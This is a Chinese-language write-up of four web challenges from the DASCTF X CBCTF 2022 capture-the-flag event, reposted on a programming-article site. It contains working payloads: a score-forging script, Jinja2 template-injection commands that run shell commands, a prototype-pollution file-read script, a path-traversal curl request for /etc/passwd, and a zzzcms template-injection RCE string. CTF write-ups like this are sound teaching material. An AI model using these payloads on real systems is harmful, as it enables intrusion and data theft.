【Web】DASCTF X CBCTF 2022九月挑战赛 题解

2024-04-19 15:44

本文主要是介绍【Web】DASCTF X CBCTF 2022九月挑战赛 题解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

dino3d 

Text Reverser 

cbshop

zzz_again


dino3d 

进来是一个js小游戏

先随便玩一下,显示要玩够1000000分

 

直接console改分数会被检测

 

先是JSFinder扫一下,扫出了check.php

到js里关键词索引搜索check.php

 搜索sn,发现传入的参数是score和checkCode

搜索checkCode 

 

搜索salt

 

import requests
from hashlib import md5
import time
target = "http://node5.buuoj.cn:27231/check.php"headers = {"Content-type": "application/x-www-form-urlencoded; charset=UTF-8"
}body = {"score": "10000000","checkCode": md5("10000000DASxCBCTF_wElc03e".encode()).hexdigest(),"tm": str((time.time()))[:10]
}res = requests.post(target, headers=headers, data=body)
print(res.text)

 

 

Text Reverser 

先随便测试功能

测出有对SSTI的waf

 

给一段字符逆向脚本

s = "待逆向字符"
r = s[::-1]
print(r)

 {% print(7*7)%}

 

{%print ''.__class__.__bases__[0].__subclasses__()%}

 

 

找到os在132索引处

{%print ''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('tail /flag').read()%}

 

cbshop

 

先随便登录一下 ,有10元,但flag要11元

 拿到附件审源码

flag位置在了/flag

 

admin信息 

 

直接放控制台运行

 

成功以admin登录  

 

 现在钱是够够的了 

 但还是不能直接买flag

 

回头看源码,有这样一段逻辑

 

需要user.token属性为true

但代码中并没有定义token

 

可以在buyApi中利用assign打原型链污染

 先令user.username为__proto__,污染Object.token属性

{"name": "/flag", "id": 2, "token": true}

 打入污染

 再以admin登录,去买flag,发现还是有限制要绕(就是传入的json数据不能包含flag关键字)

 

使用URL 实例可以正常读取文件,将 flag 进行url编码从而绕过

import requests
session = requests.Session()url = "http://d6b2d3d7-8768-4eac-9cbb-f2f2be45b4ff.node5.buuoj.cn:81/" # 题目urldef login():data = {"username": "admin","password": "\uDE00admi"}session.post(url + "login", json = data)def changeUsername():data = { "username": "__proto__" }session.post(url + "changeUsername", json = data)def buyFlag():data = {"name":{"href": 'file:///fl%61g',"origin": 'null',"protocol": 'file:',"username": '',"password": '',"host": '',"hostname": '',"port": '',"pathname": '/fl%61g',"search": '',"searchParams": "URLSearchParams {}","hash": ''},"id":2,"token":True}res = session.post(url + "buy", json = data)return res.textif __name__ == '__main__':login()changeUsername()flag = buyFlag()print(flag)

 

zzz_again

 

 

XCTF高校挑战赛与zzzcms 2.1.4最新版前台RCE | Matrix 

经过验证可以进行一个任意文件的读,但不知道flag路径,走不下去 

curl -d "template=../../../../../../../../etc/passwd" -X POST http://node5.buuoj.cn:29834/search/

 

再去搜RCE的洞 

Vuls/zzzcms/zzzphp V2.1.0 RCE/zzzphp V2.1.0 RCE.md at main · metaStor/Vuls · GitHub 

直接照着打也打不通,高版本模板注入RCE入口的location估计不能是search了

进入解析模板

 解析location

当location=list时,跟进parserList 

 

最后进到parserListPage 

 

发现其是从url中接参,最后做一些简单的拼接并替换掉正在执行的模板文件

 

一顿逻辑走下来后发现没有waf,到此我们就可以成功得到恶意的模板文件

 

接着再来看parserIfLabel对模板文件是怎么处理的

 dangerkey有waf处理

 过掉waf后可以往下走到eval拼接命令执行

最终payload:

/?location=list&aaa={if:=strtolower("SYSTEM")("cat /f111l00g")}{end if}&aaa=111

这篇关于【Web】DASCTF X CBCTF 2022九月挑战赛 题解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/917965

相关文章

Spring常见错误之Web嵌套对象校验失效解决办法

《Spring常见错误之Web嵌套对象校验失效解决办法》:本文主要介绍Spring常见错误之Web嵌套对象校验失效解决的相关资料,通过在Phone对象上添加@Valid注解,问题得以解决,需要的朋... 目录问题复现案例解析问题修正总结  问题复现当开发一个学籍管理系统时,我们会提供了一个 API 接口去

使用IntelliJ IDEA创建简单的Java Web项目完整步骤

《使用IntelliJIDEA创建简单的JavaWeb项目完整步骤》:本文主要介绍如何使用IntelliJIDEA创建一个简单的JavaWeb项目,实现登录、注册和查看用户列表功能,使用Se... 目录前置准备项目功能实现步骤1. 创建项目2. 配置 Tomcat3. 项目文件结构4. 创建数据库和表5.

手把手教你idea中创建一个javaweb(webapp)项目详细图文教程

《手把手教你idea中创建一个javaweb(webapp)项目详细图文教程》:本文主要介绍如何使用IntelliJIDEA创建一个Maven项目,并配置Tomcat服务器进行运行,过程包括创建... 1.启动idea2.创建项目模板点击项目-新建项目-选择maven,显示如下页面输入项目名称,选择

Java Web指的是什么

Java Web指的是使用Java技术进行Web开发的一种方式。Java在Web开发领域有着广泛的应用,主要通过Java EE(Enterprise Edition)平台来实现。  主要特点和技术包括: 1. Servlets和JSP:     Servlets 是Java编写的服务器端程序,用于处理客户端请求和生成动态网页内容。     JSP(JavaServer Pages)

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

EasyPlayer.js网页H5 Web js播放器能力合集

最近遇到一个需求,要求做一款播放器,发现能力上跟EasyPlayer.js基本一致,满足要求: 需求 功性能 分类 需求描述 功能 预览 分屏模式 单分屏(单屏/全屏) 多分屏(2*2) 多分屏(3*3) 多分屏(4*4) 播放控制 播放(单个或全部) 暂停(暂停时展示最后一帧画面) 停止(单个或全部) 声音控制(开关/音量调节) 主辅码流切换 辅助功能 屏

C++ | Leetcode C++题解之第393题UTF-8编码验证

题目: 题解: class Solution {public:static const int MASK1 = 1 << 7;static const int MASK2 = (1 << 7) + (1 << 6);bool isValid(int num) {return (num & MASK2) == MASK1;}int getBytes(int num) {if ((num &

C语言 | Leetcode C语言题解之第393题UTF-8编码验证

题目: 题解: static const int MASK1 = 1 << 7;static const int MASK2 = (1 << 7) + (1 << 6);bool isValid(int num) {return (num & MASK2) == MASK1;}int getBytes(int num) {if ((num & MASK1) == 0) {return

9.8javaweb项目总结

1.主界面用户信息显示 登录成功后,将用户信息存储在记录在 localStorage中,然后进入界面之前通过js来渲染主界面 存储用户信息 将用户信息渲染在主界面上,并且头像设置跳转,到个人资料界面 这里数据库中还没有设置相关信息 2.模糊查找 检测输入框是否有变更,有的话调用方法,进行查找 发送检测请求,然后接收的时候设置最多显示四个类似的搜索结果

JavaWeb【day09】--(Mybatis)

1. Mybatis基础操作 学习完mybatis入门后,我们继续学习mybatis基础操作。 1.1 需求 需求说明: 根据资料中提供的《tlias智能学习辅助系统》页面原型及需求,完成员工管理的需求开发。 通过分析以上的页面原型和需求,我们确定了功能列表: 查询 根据主键ID查询 条件查询 新增 更新 删除 根据主键ID删除 根据主键ID批量删除